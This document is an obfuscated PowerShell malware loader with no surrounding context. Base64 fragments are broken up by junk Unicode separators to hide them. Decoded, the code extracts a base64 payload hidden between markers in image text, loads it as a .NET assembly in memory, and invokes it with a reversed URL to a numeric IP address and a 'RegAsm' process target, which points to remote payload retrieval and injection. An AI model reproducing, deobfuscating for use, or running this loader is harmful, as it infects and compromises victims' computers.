〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷8⤏ ꒼ ⛲ ⫰ 〷Dw⤏ ꒼ ⛲ ⫰ 〷QgBB⤏ ꒼ ⛲ ⫰ 〷FM⤏ ꒼ ⛲ ⫰ 〷RQ⤏ ꒼ ⛲ ⫰ 〷2⤏ ꒼ ⛲ ⫰ 〷DQ⤏ ꒼ ⛲ ⫰ 〷XwBT⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷QQBS⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷Pg⤏ ꒼ ⛲ ⫰ 〷+⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷RgBs⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Dw⤏ ꒼ ⛲ ⫰ 〷P⤏ ꒼ ⛲ ⫰ 〷BC⤏ ꒼ ⛲ ⫰ 〷EE⤏ ꒼ ⛲ ⫰ 〷UwBF⤏ ꒼ ⛲ ⫰ 〷DY⤏ ꒼ ⛲ ⫰ 〷N⤏ ꒼ ⛲ ⫰ 〷Bf⤏ ꒼ ⛲ ⫰ 〷EU⤏ ꒼ ⛲ ⫰ 〷TgBE⤏ ꒼ ⛲ ⫰ 〷D4⤏ ꒼ ⛲ ⫰ 〷Pg⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷V⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷Ek⤏ ꒼ ⛲ ⫰ 〷bgBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷BP⤏ ꒼ ⛲ ⫰ 〷GY⤏ ꒼ ⛲ ⫰ 〷K⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷aQBt⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷ZwBl⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷LgBJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷TwBm⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷Zg⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBn⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷w⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBh⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBn⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Hs⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷r⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷T⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷ZwB0⤏ ꒼ ⛲ ⫰ 〷Gg⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷YgBh⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷ZQ⤏ ꒼ ⛲ ⫰ 〷2⤏ ꒼ ⛲ ⫰ 〷DQ⤏ ꒼ ⛲ ⫰ 〷T⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷ZwB0⤏ ꒼ ⛲ ⫰ 〷Gg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BJ⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷t⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷YQBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Ng⤏ ꒼ ⛲ ⫰ 〷0⤏ ꒼ ⛲ ⫰ 〷EM⤏ ꒼ ⛲ ⫰ 〷bwBt⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YQBn⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷V⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Hg⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷FM⤏ ꒼ ⛲ ⫰ 〷dQBi⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷By⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBn⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQB4⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷YQBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Ng⤏ ꒼ ⛲ ⫰ 〷0⤏ ꒼ ⛲ ⫰ 〷Ew⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bo⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷YwBv⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷bQBh⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BC⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷WwBT⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQ⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷EM⤏ ꒼ ⛲ ⫰ 〷bwBu⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷ZQBy⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷XQ⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷Do⤏ ꒼ ⛲ ⫰ 〷RgBy⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQBC⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷cwBl⤏ ꒼ ⛲ ⫰ 〷DY⤏ ꒼ ⛲ ⫰ 〷N⤏ ꒼ ⛲ ⫰ 〷BT⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷cgBp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷YgBh⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷ZQ⤏ ꒼ ⛲ ⫰ 〷2⤏ ꒼ ⛲ ⫰ 〷DQ⤏ ꒼ ⛲ ⫰ 〷QwBv⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷bQBh⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷bwBh⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBk⤏ ꒼ ⛲ ⫰ 〷EE⤏ ꒼ ⛲ ⫰ 〷cwBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQBi⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷eQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷Bb⤏ ꒼ ⛲ ⫰ 〷FM⤏ ꒼ ⛲ ⫰ 〷eQBz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷ZQBt⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷UgBl⤏ ꒼ ⛲ ⫰ 〷GY⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bg⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷EE⤏ ꒼ ⛲ ⫰ 〷cwBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQBi⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷eQBd⤏ ꒼ ⛲ ⫰ 〷Do⤏ ꒼ ⛲ ⫰ 〷OgBM⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bj⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQBt⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷bgBk⤏ ꒼ ⛲ ⫰ 〷EI⤏ ꒼ ⛲ ⫰ 〷eQB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷cw⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷eQBw⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BB⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷cwBl⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YgBs⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷LgBH⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BU⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷c⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷JwBk⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷LgBJ⤏ ꒼ ⛲ ⫰ 〷E8⤏ ꒼ ⛲ ⫰ 〷LgBI⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQBl⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷7⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bt⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bo⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷eQBw⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷LgBH⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BN⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bo⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷VgBB⤏ ꒼ ⛲ ⫰ 〷Ek⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷bwBr⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷K⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷dQBs⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷L⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Fs⤏ ꒼ ⛲ ⫰ 〷bwBi⤏ ꒼ ⛲ ⫰ 〷Go⤏ ꒼ ⛲ ⫰ 〷ZQBj⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷WwBd⤏ ꒼ ⛲ ⫰ 〷F0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷B4⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷LgBO⤏ ꒼ ⛲ ⫰ 〷E4⤏ ꒼ ⛲ ⫰ 〷Sg⤏ ꒼ ⛲ ⫰ 〷v⤏ ꒼ ⛲ ⫰ 〷D⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷M⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷x⤏ ꒼ ⛲ ⫰ 〷C8⤏ ꒼ ⛲ ⫰ 〷M⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷1⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷OQ⤏ ꒼ ⛲ ⫰ 〷4⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷M⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷5⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷NQ⤏ ꒼ ⛲ ⫰ 〷0⤏ ꒼ ⛲ ⫰ 〷C8⤏ ꒼ ⛲ ⫰ 〷Lw⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷H⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷Gg⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBz⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBz⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBz⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷s⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷UgBl⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷QQBz⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷s⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 